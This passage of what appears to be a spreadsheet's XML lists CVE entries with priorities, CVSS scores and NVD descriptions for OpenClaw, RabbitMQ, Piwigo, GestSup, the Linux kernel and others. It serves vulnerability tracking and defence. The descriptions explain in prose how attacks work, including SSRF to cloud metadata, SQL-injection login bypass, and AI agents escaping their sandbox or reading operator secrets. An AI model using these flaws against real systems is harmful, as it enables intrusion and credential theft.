          <t>OpenClaw versions before 2026.8.1 fail to properly restrict access to operator command cron jobs, allowing model-visible agent callers to read and execute ownerless command jobs. Attackers can inspect stored environment variables and force-run disabled or unscheduled command jobs to access secrets and execute operator-authored commands.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100568</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100588</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 does not enforce the administrator scope requirement on browser control when it is reached through the node.invoke method, although direct browser.request access requires administrator scope. In Gateway deployments that honor caller identity and narrower operator scopes, a write-scoped caller with access to a connected browser-capable node can inspect pages, navigate tabs, or interact with browser-visible applications without the configured admin requirement; practical impact depends on the browser profile and signed-in state. Shared-secret token and password callers are considered fully trusted operators under OpenClaw's security model and are not affected. The issue is fixed in 2026.7.1.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100588</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100589</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 contain a sandbox bypass vulnerability in the browser tool that allows sandboxed sessions to access paired node browser actions despite allowHostControl=false configuration. Attackers with control over sandboxed agent input can select a paired node and perform host browser operations, inspecting or manipulating the connected browser profile and its authenticated state.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100589</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100391</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>MediaFlow Proxy through 2.4.9 contains a server-side request forgery vulnerability in the /proxy routes due to missing and incomplete destination validation in the d query parameter. Remote attackers can supply arbitrary internal URLs including loopback and cloud metadata endpoints to read full responses from the proxy server.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100391</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100567</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an agent gateway distributed as the npm package 'openclaw'. In versions &gt;= 2026.4.5 and &lt; 2026.8.1, the Gateway validated a single DNS resolution result for a configured remote Chrome DevTools Protocol (CDP) hostname, but the raw WebSocket and Playwright transports performed a later, independent DNS resolution, discarding the DNS pinning enforced at validation time. An attacker who controls an approved CDP hostname or its DNS answers can exploit this check-then-use gap via DNS rebinding to make the Gateway connect to a loopback, private, link-local, cloud metadata, or other SSRF-policy-denied address. The impact depends on the remote CDP configuration, DNS timing, and the services reachable from the Gateway host. The issue is fixed in 2026.8.1; as a mitigation, disable hostname-based remote CDP endpoints or restrict them to trusted, stable infrastructure.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100567</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67236</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.8 and 4.3.2, a successful POST /login caused is_authorized/2 to set an auth cookie containing base64-encoded username:password credentials without HttpOnly, Secure, SameSite, or expiration protections. Because base64 is encoding rather than encryption, an attacker with same-origin cross-site scripting, an HTTP-readable network position, or local access to the browser cookie store could recover the actual login credentials; older browsers that treated an absent SameSite attribute as None also sent the cookie cross-site. This issue is fixed in versions 4.2.8 and 4.3.2.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67236</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67409</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 4.3.3, 4.2.9, 4.1.14, 4.0.23, and 3.13.18, JWKS Fetch Ignores HTTP Response Status Code - Signing Key Destruction Causes Authentication DoS (CWE-252). the JWKS key fetching mechanism in uaajwt.erl does not validate the HTTP response status code when downloading signing keys from the OAuth2 provider's JWKS endpoint. Non-200 responses (including 4xx and 5xx errors) are processed identically to successful responses. When the JWKS endpoint returns an error response with a valid-JSON body that lacks a keys field, all previously cached signing keys are destroyed, causing a persistent authentication denial of Files: deps/rabbitmqauthbackendoauth2/src/uaajwt.erl, lines 50-63 deps/rabbitmqauthbackendoauth2/src/uaajwks.erl, lines 5-7 deps/rabbitmqauthbackendoauth2/src/rabbitoauth2provider.erl, lines 98-107 Bug 1: HTTP status code ignored (uaajwt.erl:50-63): The Erlang httpc module returns {ok, {{HttpVersion, StatusCode, ReasonPhrase}, Headers, Body}}. The pattern {ok, {, , JwksBody}} matches ANY successful HTTP transaction Persistent authentication DoS: Once keys are destroyed, ALL OAuth2/JWT authentication fails for all users until a new successful JWKS refresh occurs Amplification: A single attacker can deny access to all legitimate OAuth2 users across the entire RabbitMQ. This issue is fixed in versions 4.3.3, 4.2.9, 4.1.14, 4.0.23, and 3.13.18.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67409</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67410</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.3.3 and 4.2.9, OAuth2 Client Secret Exposed via Unauthenticated JavaScript Endpoint (CWE-200). when OAuth2 authentication is enabled for the RabbitMQ Management UI and the configured flow, IDP use a client secret, the oauthclientsecret configuration value is included in the JavaScript served by the unauthenticated endpoint /js/oidc-oauth/bootstrap.js. Any user who can reach the management UI port can retrieve the OAuth2 client secret without Files: deps/rabbitmqmanagement/src/rabbitmgmtwmauth.erl, line 186 deps/rabbitmqmanagement/src/rabbitmgmtoauthbootstrap.erl, lines 35-50 deps/rabbitmqmanagement/src/rabbitmgmtdispatcher.erl, lines 45-49 (route registration) Code Path: 1. The route /js/oidc-oauth/bootstrap.js is registered as a plain Cowboy handler (rabbitmgmtdispatcher.erl:46): Credential exposure for the affected configuration: OAuth2 client secret is accessible without any authentication Token theft: Attacker can complete the authorization code flow using stolen authorization codes Client impersonation: Attacker can make requests. Any RabbitMQ deployment with: This issue is fixed in versions 4.3.3 and 4.2.9.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67410</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97525</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr"/>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm/pat: Allocate split page tables as kernel page tables
A PTE is allocated directly without going through the standard page table
allocation routines (such as pte_alloc_one_kernel()) when the CPA code
splits a large page (__split_large_page()).
This means the page table constructor is never called nor is the page table
marked as a kernel page table.
The former results in the folio associated with the page table not being
marked as a page table (__pagetable_ctor() is never called thus neither is
__folio_set_pgtable()) nor are statistics updated to reflect
it (lruvec_stat_add_folio() is never called).
The latter issue of failing to mark the page table as a kernel page
table (ptdesc_set_kernel() is never called) is far more problematic.
Since commit:
  5ba2f0a15564 ("mm: introduce deferred freeing for kernel page tables")
kernel page table freeing has been batched and since the
subsequent commit:
  e37d5a2d60a3 ("iommu/sva: invalidate stale IOTLB entries for kernel address space")
IOTLB cache entries for kernel page tables have been invalidated upon
being freed.
Since split page tables are freed without this invalidation, the IOTLB
can contain stale entries for them.
Resolve the issue by using the ordinary PTE allocation API at split time.
This results in these kernel page tables invoking a page table constructor,
and thus requires a page table destructor.
Destructors are not always present, like for early allocated direct map
page tables). Conditionally call pagetable_dtor_free() if the PG_table
folio flag for the ptdesc is set, otherwise we free the page table via
pagetable_free().
Regardless of which path is taken page tables marked as kernel page tables,
which now includes split page tables, take the correct route through
pagetable_free_kernel().
There is a user-visible side effect in that split page tables will appear
in nr_page_table_pages in /proc/vmstat (as do other kernel page tables
allocated after early boot), however this is a positive change.
This issue started being markedly problematic after commit:
  5ba2f0a15564 ("mm: introduce deferred freeing for kernel page tables")
so choose this as the Fixes target.
[ dhansen: rephrase in imperative mood ]</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97525</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100387</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>pgPointcloud through 1.2.5 contains a heap out-of-bounds read vulnerability in dimensional patch WKB deserialization that allows authenticated database users to read adjacent heap memory. Attackers can supply crafted pcpatch values with attacker-controlled size fields to copy heap memory into stored patches for exfiltration or crash the PostgreSQL backend.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100387</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100389</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>GestSup versions before 3.2.61 contain a remote code execution vulnerability in the basic IMAP connector's attachment handling that fails to skip blocked file extensions. Unauthenticated attackers can send emails with PHP attachments to monitored mailboxes, which are written to the web-accessible upload/ticket directory and executed when accessed.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100389</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100532</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>sap, npm, gin</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>@openclaw/whatsapp (npm) before 2026.8.1 exposes the WhatsApp login tool through the generic channel-tool path without preserving the originating sender's owner status, so the owner-only tool boundary is not enforced. An admitted non-owner sender able to steer the tool can request a forced login and receive a new QR code for a configured account, disconnecting the Gateway's WhatsApp account and causing loss of availability; full account relinking additionally requires the attacker to scan the returned QR code with another phone. The issue affects the owner-only tool boundary rather than WhatsApp transport authentication. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100532</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44642</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, check_upgrade_access_rights() in admin/include/functions_upgrade.php conditionally escapes the submitted username only when the removed get_magic_quotes_gpc function exists, so PHP 8 and later concatenate an unauthenticated username directly into the upgrade authentication SQL query. When database upgrades are pending, a crafted query result can satisfy the status and password checks, set PHPWG_IN_UPGRADE, and authorize upgrade execution without valid administrator credentials. This can cause unauthorized database integrity changes and service disruption. This vulnerability is fixed in 16.4.0.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44642</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51773</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>vmware</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>An issue in the VMware datastore driver of OpenStack glance_store. When an authenticated attacker provides a maliciously crafted image location URI pointing to an external server, the _retry_request function fails to validate the destination host before attaching sensitive authentication headers.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51773</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92713</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
